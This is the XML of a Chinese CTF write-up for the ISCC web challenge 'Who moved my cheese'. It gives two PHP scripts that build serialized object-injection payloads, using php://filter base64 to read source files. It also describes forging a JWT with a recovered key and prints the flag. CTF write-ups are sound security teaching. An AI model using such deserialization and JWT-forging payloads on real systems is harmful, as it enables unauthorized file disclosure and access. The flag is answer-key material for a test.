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4DFA74">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web+谁动了我的奶酪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0308C21A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D6A8C8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打开网页发现输入框，猜测是tom，输入后进入新页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893F7CC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1125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="302172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7272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B838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3665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9133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57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7D5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分析源码后发现是个PHP对象注入，尝试构造payload读取clue.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8685C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp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91534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6ABEA70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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F19E739">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0FC833F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Jerry {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E7EAF20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</w:p>
          <w:p w14:paraId="2D11260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$secretHidingSpot;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05ECDEB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$squeak;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B28FC3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$shout;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD4BD3C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="586C5F8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5099380C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2108102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Cheese {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D619D29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$flavors;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D70FA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$color; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39813B43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2DCB43E5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C17704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 = new Jerry();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="565F19F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$jerry-&gt;secretHidingSpot = "php://filter/convert.base64-encode/resource=clue.php";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C0FC598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 = new Cheese();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178A002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$cheese-&gt;color = serialize($jerry);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2435423F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B9809F9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$payload = serialize($cheese);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52C35BF7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D2F53C0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echo urlencode($payload);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BACF3C6">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C439E1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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7230494D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904240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="947419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908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CABA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1920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="13402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193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92D">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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解码后发现下一个提示是 flag_of_cheese.php，继续构造payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B98DF1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1770" cy="2417445"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="9429639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3941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9CDD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp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218AD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202D3AF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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023B280A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="327BBE1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Jerry {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5038EDAC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$secretHidingSpot;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3302C47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$squeak;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C38C38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$shout;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B2F7B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04D76070">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="559B5A84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class Cheese {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43EC4BC6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$flavors;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B23D241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 public $color;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0845F3F7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14:paraId="7EACF0DE">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BA15FF2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 = new Jerry();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC6D68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$jerry-&gt;secretHidingSpot = "php://filter/convert.base64-encode/resource=flag_of_cheese.php";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63216B49">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="141DB2B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 = new Cheese();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="525E4FED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$cheese-&gt;color = serialize($jerry);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="072D2672">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A2893BE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$payload = serialize($cheese);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B8BFEF">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17A7FA7C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echo urlencode($payload);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2241258A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41786071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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CEB0ED8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="575945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="999131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3169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9CFD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63515" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7322557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55731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7B53">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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再次解码后获得一半的flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC97AC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1770" cy="2369185"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="4909993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9387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8D6C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观察到原本网页为Y2hlZXNlT25l.php，解码后为cheeseOne，尝试访问cheeseTwo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F56A25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2675890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="216173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39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269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2664460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="2023557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5708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E81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4460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="2057299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9936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41A6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查看源码发现线索，key为Jerry_Loves_Cheese</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE79F4B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263515" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16101363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36303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226C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67635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="830250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00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676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抓包发现有jwt，尝试修改后再发，获得另一半flag地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE6EAD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263515" cy="2607945"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="15358157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15703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E240">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule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3515" cy="2799080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="10356859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596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A40F">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问后获得另一半加密后的flag，根据前面提示与0x16异或即得flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69636438">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263515" cy="2799080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="15040859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85986" name="图片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86A6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2651125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="128679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98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2A4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即Flag: ISCC{J3rry_g0t_h1s_f@v0r!7e_ch33se}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D12452"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41D124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877"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="001D2B08"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="002663E7"/>
    <w:rsid w:val="00390F30"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F6770"/>
    <w:rsid w:val="004349FC"/>
    <w:rsid w:val="00497FB1"/>
    <w:rsid w:val="004C7A13"/>
    <w:rsid w:val="00536CC2"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005849AA"/>
    <w:rsid w:val="00586F3A"/>
    <w:rsid w:val="005B605D"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="00636A21"/>
    <w:rsid w:val="006C097D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00765353"/>
    <w:rsid w:val="007C11A5"/>
    <w:rsid w:val="0080644C"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008717B7"/>
    <w:rsid w:val="00883570"/>
    <w:rsid w:val="008B0607"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="008B6971"/>
    <w:rsid w:val="008B7D2B"/>
    <w:rsid w:val="008C510D"/>
    <w:rsid w:val="008F08F6"/>
    <w:rsid w:val="009166C2"/>
    <w:rsid w:val="00976812"/>
    <w:rsid w:val="009937FC"/>
    <w:rsid w:val="009B648C"/>
    <w:rsid w:val="00A00690"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00A172E0"/>
    <w:rsid w:val="00AB4C7D"/>
    <w:rsid w:val="00AC50F4"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B2131B"/>
    <w:rsid w:val="00B475A3"/>
    <w:rsid w:val="00B825D4"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CA5793"/>
    <w:rsid w:val="00CD7DCC"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00E70BF9"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="21592B98"/>
    <w:rsid w:val="7E09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40" w:lineRule="exact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line="240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00" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts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360" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30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line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs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8">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="21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eastAsia="宋体" w:cs="宋体"/>
      <w:kern w:val="0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  <w:szCs w:val="24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12"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30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4 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="8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2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9E991-657F-4D14-80E0-94E3ED3458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253</Words>
  <Characters>965</Characters>
  <Lines>54</Lines>
  <Paragraphs>9</Paragraphs>
  <TotalTime>87</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1056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2025-05-10T12:45:00Z</dcterms:created>
  <dc:creator>WPS_1664372582</dc:creator>
  <cp:lastModifiedBy>.WHICH.</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-16T09:28:20Z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eyJoZGlkIjoiYjVjMTlhODI2OTA4MzI2YTBiZjY2OGM4NDE5NGIyMDgiLCJ1c2VySWQiOiIxNDIwNTAyMzQ2In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.20784</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>79024C9C173442E1BF64119983AD909B_13</vt:lpwstr>
  </property>
</Properties>
</file>